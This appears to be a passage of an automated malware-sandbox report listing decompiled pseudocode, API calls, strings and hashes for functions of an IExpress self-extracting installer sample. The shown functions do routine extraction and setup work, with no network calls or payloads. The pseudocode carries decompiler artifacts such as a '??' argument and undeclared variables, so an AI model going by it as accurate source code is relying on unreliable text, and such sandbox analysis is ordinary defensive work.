Function 00306495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00306495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x308004; // 0xcd371c79
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00301781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
				_t26 = "advpack.dll";
				E0030658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00306CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x00306495
0x00306495
0x003064a0
0x003064a7
0x003064ab
0x003064bd
0x003064c2
0x003064d3
0x003064df
0x003064e8
0x00306502
0x003064ee
0x003064f9
0x003064f9
0x00306516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003064DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003064F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00306502

Strings

advpack.dll, xrefs: 003064C2, 003064CD, 00306501
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003064AC

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
API String ID: 438848745-875882553
Opcode ID: 16d461227d4ff2e337dbc02ea2b04561926b1ea87b3c84fdf071c8b2269755a4
Instruction ID: 785a28fe0819fe1c115e31272918d02077a43bbed991627996c62b7d140a560f
Opcode Fuzzy Hash: 16d461227d4ff2e337dbc02ea2b04561926b1ea87b3c84fdf071c8b2269755a4
Instruction Fuzzy Hash: 2E014930A02508ABE715DB60DC6AFEE733CDB51310F400196F585920C4CFB09E86CA01

Uniqueness

Uniqueness Score: -1.00%

Function 00304169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00304169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0030468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0030468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E003044B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E003044B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x0030417d
0x0030418f
0x00304193
0x003041b7
0x003041d3
0x003041e6
0x00000000
0x003041e7
0x003041d5
0x003041d6
0x003041d8
0x003041d9
0x003041da
0x003041df
0x003041e1
0x00000000
0x003041e1
0x003041b9
0x003041ba
0x003041bc
0x003041bd
0x003041be
0x00000000
0x003041be
0x00000000

APIs

Part of subcall function 0030468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046A0
Part of subcall function 0030468F: SizeofResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046A9
Part of subcall function 0030468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046C3
Part of subcall function 0030468F: LoadResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046CC
Part of subcall function 0030468F: LockResource.KERNEL32(00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046D3
Part of subcall function 0030468F: memcpy_s.MSVCRT ref: 003046E5
Part of subcall function 0030468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003046EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,003030B4), ref: 00304189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,003030B4), ref: 003041E7

Part of subcall function 003044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00304518
Part of subcall function 003044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00304554

Strings

FINISHMSG, xrefs: 00304173, 003041AB
<None>, xrefs: 003041C5

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: cc9bb6ab730c190229262884f7dbf24651cb4d8ddeff331d2267479f5f19abf3
Instruction ID: 186d6bdd2447d6d0c18f6556aab75f85d900309359199862b437e633ea70f6b6
Opcode Fuzzy Hash: cc9bb6ab730c190229262884f7dbf24651cb4d8ddeff331d2267479f5f19abf3
Instruction Fuzzy Hash: 5A01F4F53033187BF32B26665CB6F7B218EDBD4795F01402AB706E51C09AA9CE0141B5

Uniqueness

Uniqueness Score: -1.00%

Function 00307155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00307155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x308004; // 0xcd371c79
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x308004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x308004 = _t39;
				}
				_t37 =  !_t36;
				 *0x308008 = _t37;
				return _t37;
			}

0x0030715d
0x00307161
0x00307165
0x00307178
0x00307182
0x0030718e
0x00307197
0x003071a0
0x003071b1
0x003071b8
0x003071c4
0x003071c7
0x003071cb
0x003071d5
0x003071da
0x003071da
0x003071dc
0x003071dc
0x003071e2
0x003071e5
0x003071ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00307182
GetCurrentProcessId.KERNEL32 ref: 00307191
GetCurrentThreadId.KERNEL32 ref: 0030719A
GetTickCount.KERNEL32 ref: 003071A3
QueryPerformanceCounter.KERNEL32(?), ref: 003071B8

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 1c08ae6a0de1aa0f3c1ee3043c862f4180821e841331c41711b08497d55fb447
Instruction ID: 16c24d734f9e1e9a23917c8ea602498e7b45c2be78ef085e717019a7a9b8979e
Opcode Fuzzy Hash: 1c08ae6a0de1aa0f3c1ee3043c862f4180821e841331c41711b08497d55fb447
Instruction Fuzzy Hash: 86114C71D02608EFCB15DFB8EA68A9EB7F8FF08311F614866D801E7250EA309A04CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003019E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E003019E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x308004; // 0xcd371c79
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E003043D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x309a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00306CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x003019e0
0x003019e0
0x003019eb
0x003019f2
0x003019f9
0x003019fc
0x00301a01
0x00301a2a
0x00301a2e
0x00301a3e
0x00301a4f
0x00301a62
0x00301a6a
0x00000000
0x00301a03
0x00301a06
0x00301a20
0x00301a20
0x00301a08
0x00301a08
0x00301a14
0x00000000
0x00301a16
0x00301a18
0x00301a70
0x00301a72
0x00301a72
0x00301a14
0x00301a06
0x00301a81

APIs

EndDialog.USER32(?,?), ref: 00301A18
GetDesktopWindow.USER32 ref: 00301A24
LoadStringA.USER32(?,?,00000200), ref: 00301A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00301A62
MessageBeep.USER32(000000FF), ref: 00301A6A

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 02227604d72ba2511ae513993faa6bc11da8562a86205c6c0b43052c7007ead2
Instruction ID: 17500b6fce2bd994512f05a261f537f7da5dbc95dc865964c275715665ad84ba
Opcode Fuzzy Hash: 02227604d72ba2511ae513993faa6bc11da8562a86205c6c0b43052c7007ead2
Instruction Fuzzy Hash: 3511E131602209AFDB06EF68ED28BAE77BCEF09300F008152F912961D0CA309E10CB95

Uniqueness

Uniqueness Score: -1.00%

Function 003063C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E003063C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x308004; // 0xcd371c79
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00301781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
				E0030658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x309124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x309124 = 0x80070052;
					_t37 = 0;
				}
				return E00306CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x003063cb
0x003063d2
0x003063d8
0x003063ea
0x003063f3
0x00306401
0x00306402
0x00306410
0x00306415
0x00306433
0x00306438
0x00306449
0x00306463
0x0030646d
0x00306477
0x00306477
0x0030647a
0x0030643a
0x0030643a
0x00306444
0x00306444
0x00306492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0030642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0030645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0030647A

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003063EB

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 1065093856-3647970563
Opcode ID: 9bd62f3822d7b18b9079c59b490066ad231975e7aedc9019e3ee84b3eeed84bf
Instruction ID: 8689da8b786bac6b1dd82f334fe27b21d2ee7d1bdf6dccd8d96a1c6b279b2e1c
Opcode Fuzzy Hash: 9bd62f3822d7b18b9079c59b490066ad231975e7aedc9019e3ee84b3eeed84bf
Instruction Fuzzy Hash: 1721E471A0221CAFDB12DF25DC96FEB737CEB45314F0041AAF585A7280DAB05D958FA4

Uniqueness

Uniqueness Score: -1.00%

Function 003047E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003047E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00301680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x3091e0; // 0x3427af0
						 *(_t34 + 4) = _t11;
						 *0x3091e0 = _t34;
						return 1;
					}
					_t25 =  *0x308584; // 0x0
					E003044B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x308584; // 0x0
				E003044B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x003047e8
0x003047f0
0x003047f4
0x0030480f
0x00304811
0x00304814
0x00304814
0x00304816
0x00304817
0x00304829
0x0030482b
0x0030482f
0x0030484f
0x00304852
0x00304855
0x00304855
0x00304857
0x00304858
0x00304860
0x00304865
0x0030486a
0x0030486f
0x00000000
0x00304876
0x00304831
0x00304841
0x00304847
0x0030480b
0x00000000
0x0030480b
0x003047f6
0x00304806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00304E6F), ref: 003047EA
LocalAlloc.KERNEL32(00000040,?), ref: 00304823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00304847

Part of subcall function 003044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00304518
Part of subcall function 003044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00304554

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00304851

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 359063898-3647970563
Opcode ID: 551040b7ba781c3fbb6033ff57e923c11203a1f1bd09b7b0f5da5e795574f157
Instruction ID: fef62887b3505da0d2470b3a6970aea11ede723a5112aeb2607a8734f4b0eb2e
Opcode Fuzzy Hash: 551040b7ba781c3fbb6033ff57e923c11203a1f1bd09b7b0f5da5e795574f157
Instruction Fuzzy Hash: 5E11E7B5206741AFD71A8F24AC38B72375DE785300F04891AEB829B381DA768D068660

Uniqueness

Uniqueness Score: -1.00%

Function 00303680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00303680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x0030368c
0x0030368f
0x00303691
0x0030369f
0x003036a7
0x00000000
0x00000000
0x003036ba
0x00000000
0x003036bc
0x003036bc
0x003036c0
0x003036cb
0x003036c2
0x003036c4
0x003036c4
0x003036da
0x003036e0
0x003036e6
0x00000000
0x00000000
0x003036e6
0x00000000
0x003036ba
0x003036ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0030369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003036B2
DispatchMessageA.USER32(?), ref: 003036CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003036DA

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: fe05df4539e76d513cd4456fe54376aace81b592b9f16f0ec4d0ba2ae0ecc4b2
Instruction ID: 7ac50c0cb85abd7098efd8d0893b628698f03f72211b8625ab4b6825c9cf2a97
Opcode Fuzzy Hash: fe05df4539e76d513cd4456fe54376aace81b592b9f16f0ec4d0ba2ae0ecc4b2
Instruction Fuzzy Hash: BB01677290225D77DB314BA66C98EEB767CEBC6B10F15011AF915E21C0D561C644C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 003065E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E003065E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x003065e8
0x003065ed
0x003065ef
0x003065f2
0x003065f4
0x003065f4
0x003065f6
0x003065f7
0x00306608
0x00306611
0x00306618
0x0030661c
0x00000000
0x00000000
0x0030660e
0x00306623
0x00306625
0x0030663b
0x0030663b
0x0030663d
0x00306641
0x00306610
0x00306610
0x00000000
0x00306610
0x00306644
0x00306647
0x00306647
0x00306621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00302B33), ref: 00306602
CharPrevA.USER32(?,00000000), ref: 00306612
CharPrevA.USER32(?,00000000), ref: 00306629
CharNextA.USER32(00000000), ref: 00306635

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 411ef5a0cf9b746f0f5baab2ddaf2f45ca3c49723da96e10f62949de1b4de26c
Instruction ID: 077acecebb5fd00bd79a1a2b5b93876fd57fc22feb1828bcd148bd33c37cb77d
Opcode Fuzzy Hash: 411ef5a0cf9b746f0f5baab2ddaf2f45ca3c49723da96e10f62949de1b4de26c
Instruction Fuzzy Hash: CCF02832007A506EE7375B289CA89BBBF9CCF87354F2A01AFE4D282045D6160D068661

Uniqueness

Uniqueness Score: -1.00%

Function 003069B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E003069B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x3081f8 = E00306C70();
				__set_app_type(E00306FBE(2));
				 *0x3088a4 =  *0x3088a4 | 0xffffffff;
				 *0x3088a8 =  *0x3088a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x308528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x30851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00307000();
				if( *0x308000 == 0) {
					__setusermatherr(E00307000);
				}
				E003071EF(_t6);
				return 0;
			}

0x003069b7
0x003069c2
0x003069c8
0x003069cf
0x003069d8
0x003069de
0x003069e4
0x003069e6
0x003069ec
0x003069f2
0x003069f4
0x00306a00
0x00306a07
0x00306a0d
0x00306a0e
0x00306a15

APIs

Part of subcall function 00306FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00306FC5

__set_app_type.MSVCRT ref: 003069C2
__p__fmode.MSVCRT ref: 003069D8
__p__commode.MSVCRT ref: 003069E6
__setusermatherr.MSVCRT ref: 00306A07

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: 70e5a4fcc8991f7deb92925cc0ca5e8615d1804c49b7387a6718f61b380a197c
Instruction ID: d2244c5daaffe716c74703fd14537fa798550d8b76ddcf0b73ab19f2ffa1dc0c
Opcode Fuzzy Hash: 70e5a4fcc8991f7deb92925cc0ca5e8615d1804c49b7387a6718f61b380a197c
Instruction Fuzzy Hash: 6EF0F8B050B7018FD71BAB34FD3A7093B6DFB05321F104A2AE4A18A2E1CF3A95518A11

Uniqueness

Uniqueness Score: -1.00%

Function 00306952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00306952(CHAR* __ecx) {
				long _v8;
				long _v12;
				long _v16;
				char _v20;
				int _t22;

				_t22 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if( *__ecx != 0) {
					_t6 =  &_v20; // 0x305760
					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
					}
				}
				return _t22;
			}

0x0030695b
0x00306960
0x00306963
0x00306966
0x00306969
0x0030696c
0x00306972
0x00306987
0x0030699f
0x0030699f
0x00306987
0x003069a7

APIs

GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W0,?,00000000,00305760,?,A:\), ref: 0030697F
MulDiv.KERNEL32(?,?,00000400), ref: 00306999

Strings

`W0, xrefs: 00306972, 00306975

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: DiskFreeSpace
String ID: `W0
API String ID: 1705453755-1689643277
Opcode ID: a88150ffafbf4d8e7082610cc633010f0937e9f3e21ca851b6adbca333025b09
Instruction ID: ef8e7fdaf288cd1560459b9673d6843d9a6246be2131ec964ac27db3caabea34
Opcode Fuzzy Hash: a88150ffafbf4d8e7082610cc633010f0937e9f3e21ca851b6adbca333025b09
